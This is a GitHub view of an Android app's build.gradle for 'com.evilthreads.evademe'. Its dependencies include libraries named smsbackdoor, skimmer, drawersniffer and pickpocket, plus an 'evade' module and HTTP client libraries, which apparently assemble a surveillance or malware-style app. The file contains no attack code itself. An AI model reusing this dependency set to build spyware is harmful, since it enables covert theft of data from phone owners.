-
Notifications
You must be signed in to change notification settings - Fork 13
/
Copy pathbuild.gradle
47 lines (43 loc) · 1.82 KB
/
build.gradle
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
apply plugin: 'com.android.application'
apply plugin: 'kotlin-android'
apply plugin: 'kotlin-android-extensions'
android {
compileSdkVersion 30
buildToolsVersion "30.0.2"
defaultConfig {
applicationId "com.evilthreads.evademe"
minSdkVersion 24
targetSdkVersion 30
versionCode 1
versionName "1.0"
testInstrumentationRunner "androidx.test.runner.AndroidJUnitRunner"
}
buildTypes {
release {
minifyEnabled false
proguardFiles getDefaultProguardFile('proguard-android-optimize.txt'), 'proguard-rules.pro'
}
}
}
dependencies {
ext.ktor_version = '1.4.1'
implementation fileTree(dir: 'libs', include: ['*.jar'])
implementation "org.jetbrains.kotlin:kotlin-stdlib:$kotlin_version"
implementation 'androidx.appcompat:appcompat:1.2.0'
implementation "androidx.core:core-ktx:$core_ktx_version"
implementation "androidx.lifecycle:lifecycle-runtime-ktx:2.2.0"
implementation 'com.github.evilthreads669966:smsbackdoor:3.0'
implementation 'com.github.evilthreads669966:skimmer:1.5'
implementation 'com.github.evilthreads669966:drawersniffer:0.4'
implementation 'com.github.evilthreads669966:wakescope:2.0'
implementation 'com.github.evilthreads669966:pickpocket:0.2'
implementation "org.jetbrains.kotlinx:kotlinx-coroutines-android:1.3.9"
implementation "io.ktor:ktor-client-cio:$ktor_version"
implementation "io.ktor:ktor-client-serialization-jvm:$ktor_version"
implementation "io.ktor:ktor-client-auth-jvm:$ktor_version"
implementation 'ru.superjob:kotlin-permissions:1.0.3'
implementation project(":evade")
testImplementation 'junit:junit:4.12'
androidTestImplementation 'androidx.test.ext:junit:1.1.2'
androidTestImplementation 'androidx.test.espresso:espresso-core:3.3.0'
}